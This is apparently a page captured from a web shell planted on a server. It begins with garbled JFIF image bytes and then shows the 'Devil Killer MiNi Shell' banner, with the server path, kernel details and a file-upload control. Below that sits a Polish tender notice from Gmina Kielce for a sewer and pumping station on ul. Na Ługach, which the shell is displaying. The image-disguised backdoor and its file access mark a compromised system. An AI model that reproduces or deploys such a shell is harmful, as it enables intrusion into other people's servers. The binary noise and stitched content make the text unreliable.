JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211012/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211012/0022983502-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozwój terenów inwestycyjnych- budowa kanału sanitarnego wraz<br/>z przepompownią w ul. Na Ługach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kielce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291009343</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kielce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">25-303</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.bzp@um.kielce.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.um.kielce.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozwój terenów inwestycyjnych- budowa kanału sanitarnego wraz<br/>z przepompownią w ul. Na Ługach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4d6558ef-2b53-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00229835</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00004615/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Rozwój terenów inwestycyjnych - budowa kanału sanitarnego wraz z przepompownią w ul. Na Ługach w Kielcach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.um.kielce.pl/zamowienia-publiczne/prowadzone-postepowania/roboty-budowlane/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Składanie ofert i dokumentów<br/>dołączonych do ofert odbywa się wyłącznie za pośrednictwem „Formularza do złożenia, zmiany,<br/>wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu<br/>https://miniportal.uzp.gov.pl<br/>2. Składanie dokumentów innych niż wymienione w pkt 2, w szczególności oświadczeń, wniosków,<br/>zawiadomień, zapytań oraz wszelka pozostała komunikacja pomiędzy Zamawiającym a Wykonawcami<br/>odbywa się elektronicznie wyłącznie za pośrednictwem poczty elektronicznej:<br/>zamowienia.bzp@um.kielce.pl z powołaniem się w tytule maila na znak sprawy: A-II.271.27.2021.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Oferty, oświadczenie, o którym mowa w rozdz. XI pkt 1.2., podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w rozdz. XI pkt 1.4. SWZ oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w rozdz. XI pkt. 1.3. SWZ, przedmiotowe środki dowodowe, pełnomocnictwo - sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne. Zamawiający zaleca, by dokumenty składane w ramach postępowania sporządzone były w formacie PDF.<br/>2. Ofertę, oświadczenie, o którym mowa w rozdz. XI pkt 1.2. SWZ składa się, pod rygorem<br/>nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym.<br/>3. Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, o których mowa w<br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>Zamawiający od Wykonawcy - składa się w formie elektronicznej (tj. postaci elektronicznej opatrzonej<br/>kwalifikowanym podpisem elektronicznym), w postaci elektronicznej opatrzonej podpisem zaufanym<br/>lub podpisem osobistym, lub w formie dokumentowej, w zakresie<br/>i w sposób określony w przepisach rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r.<br/>w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie.<br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku” wynosi 150 MB.<br/>5. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w „Regulaminie korzystania z systemu miniPortal” dostępnym na stronie:<br/>https://miniportal.uzp.gov.pl/WarunkiUslugi oraz „Warunkach korzystania z elektronicznej platformy<br/>usług administracji publicznej (ePUAP) dostępnych na stronie: https://www.gov.pl/web/gov/warunkikorzystania.<br/>6. Maksymalny rozmiar wiadomości przesyłanej za pomocą poczty elektronicznej wynosi 20 MB.<br/>Załączniki, których łączny rozmiar będzie większy niż 20 MB należy przesłać w kilku odrębnych<br/>wiadomościach e-mail.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej RODO, Zamawiający informuje, że:- administratorem Pani/Pana danych<br/>osobowych jest: Prezydent Miasta Kielce, Rynek 1, 25-303 Kielce;<br/>- administrator wyznaczył inspektora ochrony danych osobowych, z którym w przypadku pytań o swoje<br/>dane osobowe można skontaktować się pisząc na adres e-mail iod@um.kielce.pl;-Pani/Pana dane<br/>osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym<br/>postępowaniem o udzielenie zamówienia publicznego;-odbiorcami Pani/Pana danych osobowych będą<br/>osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18<br/>oraz art. 74 Pzp. Zamawiający udostępni dane osobowe, o których mowa w art. 10 RODO jedynie w<br/>celu umożliwienia korzystania ze środków ochrony prawnej, do upływu terminu do ich wniesienia;<br/>-przekazane dane będą przetwarzane przez okres niezbędny do realizacji celu, dla którego dane te<br/>zostały przekazane, a po tym czasie - przez okres a także w zakresie przewidzianym przez przepisy<br/>powszechnie obowiązującego prawa;<br/>-obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Pzp;<br/>- w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO;<br/>- posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących.<br/>W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO, wymagałoby<br/>niewspółmiernie dużego wysiłku, Zamawiający może żądać od Pani/Pana wskazania dodatkowych<br/>informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty<br/>postępowania o udzielenie zamówienia publicznego (w przypadku postępowań zakończonych<br/>wskazania dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy lub daty<br/>zakończonego postępowania o udzielenie zamówienia);<br/>− na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych*;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO** – jednak żądanie to<br/>nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie<br/>zamówienia publicznego;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>􀀀 nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą<br/>wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w<br/>zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego<br/>załączników.<br/>** Wyjaśnienie: jeżeli przetwarzanie zostało ograniczone, takie dane osobowe można przetwarzać,<br/>z wyjątkiem przechowywania, wyłącznie za zgodą osoby, której dane dotyczą lub w celu ustalenia,<br/>dochodzenia lub obrony roszczeń, lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z<br/>uwagi na ważne względy interesu publicznego Unii lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">A-II.271.27.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje w szczególności:<br/>1) budowę kanalizacji sanitarnej grawitacyjnej z rur PVC Ø 200 mm , rur PE-HD Ø 600 mm, wraz<br/>z wysięgnikami z rur PVC Ø 160 mm o łącznej długości około 417,00 m,<br/>2) budowę kanalizacji sanitarnej tłocznej z rur PE Ø 110 mm, oraz rur z żeliwa sferoidalnego<br/>DN100 o łącznej długości ok. 394,00 m,<br/>3) budowę przepompowni ścieków przy ul. Na Ługach w Kielcach,<br/>4) odtworzenie nawierzchni po przeprowadzonych robotach na terenach Gminy Kielce oraz<br/>terenie zamkniętym PKP,<br/>5) odtworzenie terenu po przeprowadzonych robotach budowlanych oraz pasa drogowego ul.<br/>Na Ługach zgodnie z warunkami MZD w Kielcach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Łączna ilość punktów dla każdej oferty stanowić będzie sumę punktów<br/>uzyskanych w poszczególnych kryteriach. Obliczenia w kryteriach dokonywane będą do dwóch miejsc<br/>po przecinku, a zaokrąglenia zostaną dokonane zgodnie z ogólnie przyjętymi zasadami matematyki. Za najkorzystniejszą ofertę uznana zostanie ta, która uzyska w sumie największa ilość punktów w<br/>oparciu o przyjęte kryteria.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kierownika budowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału<br/>w postępowaniu dotyczące:<br/>1.1. zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje wymagań w tym zakresie.<br/>1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie precyzuje wymagań w tym zakresie.<br/>1.3. sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie precyzuje wymagań w tym zakresie.<br/>1.4. zdolności technicznej lub zawodowej:<br/>1.4.1. Warunek dotyczący doświadczenia Wykonawcy:<br/>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu<br/>lat liczonych wstecz od dnia, w którym upływał termin składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie wykonał należycie co najmniej 2 zamówienia<br/>odpowiadające swoim rodzajem robotom stanowiącym przedmiot zamówienia tzn. wykonał<br/>roboty budowlane polegające na budowie sieci kanalizacji sanitarnej, każda o wartości nie<br/>mniejszej niż 400 000 zł brutto.<br/>1.4.2. Warunek dotyczący kwalifikacji zawodowych osób skierowanych przez Wykonawcę do realizacji zamówienia:<br/>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje<br/>co najmniej jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi w<br/>specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych, która będzie pełnić<br/>funkcję Kierownika budowy.<br/>Uwaga:<br/>Przez ww. uprawnienia budowlane Zamawiający rozumie uprawnienia budowlane, o których<br/>mowa w ustawie z dnia 07.07.1994 r. –Prawo budowlane (t.j. Dz. U z 2020 r. poz. 1333 ze zm.)<br/>oraz rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 29.04.2019 r. w sprawie przygotowania<br/>zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z<br/>2019 r. poz. 831) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie<br/>wcześniej obowiązujących przepisów prawa, lub odpowiednich przepisów obowiązujących na<br/>terenie kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, uznanych przez<br/>właściwy organ, zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji<br/>zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz.U. z 2020 r. poz.<br/>220 ze zm.) lub posiadać prawo do świadczenia usług transgranicznych zgodnie z ustawą z dnia<br/>15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa ( t.j.<br/>Dz. U. z 2019 r. poz. 1117).<br/>2. Wykonawcy występujący wspólnie:<br/>2.1. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane, do realizacji których te<br/>zdolności są wymagane.<br/>2.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek<br/>określony w pkt 1.4.1. zostanie uznany za spełniony, jeżeli wymaganym doświadczeniem<br/>wykaże się w całości co najmniej jeden z Wykonawców występujących wspólnie.<br/>3. Poleganie na podmiotach udostępniających zasoby:<br/>3.1 W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających<br/>zasoby, jeśli podmioty te wykonają roboty budowlane, do realizacji których te zdolności są<br/>wymagane.<br/>3.2. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu,<br/>w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części,<br/>polegać na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby,<br/>niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>3.3. W przypadku, gdy Wykonawca polega na podmiotach udostępniających zasoby, warunek<br/>określony w pkt 1.4.1. zostanie uznany za spełniony, jeżeli wymaganym doświadczeniem<br/>wykaże się w całości podmiot udostępniający zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy, o aktualności informacji zawartych w oświadczeniu, o którym mowa w<br/>rozdz. XI pkt 1.2. SWZ w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>Zamawiającego w rozdz. IX SWZ. W przypadku wspólnego ubiegania się o zamówienie przez<br/>Wykonawców, oświadczenie to składa każdy z Wykonawców</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. wykaz robót budowlanych wykonanych w okresie ostatnich 5 lat<br/>liczonych wstecz od dnia, w którym upływał termin składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty wykonania,<br/>miejsca i podmiotów, na rzecz których roboty budowlane zostały wykonane oraz załączeniem<br/>dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów - inne odpowiednie dokumenty;<br/>Uwaga:<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych<br/>wspólnie z innymi Wykonawcami, wykaz o którym mowa wyżej dotyczy robót budowlanych, w których<br/>wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>2. wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego,<br/>odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>3. Sposób sporządzania i składania podmiotowych środków dowodowych, o których mowa wyżej<br/>określono w rozdz. XX SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w<br/>postępowaniu w zakresie wskazanym przez Zamawiającego – którego wzór stanowi Załącznik<br/>nr 2a – 2b do SWZ. Oświadczenie to stanowi dowód potwierdzający 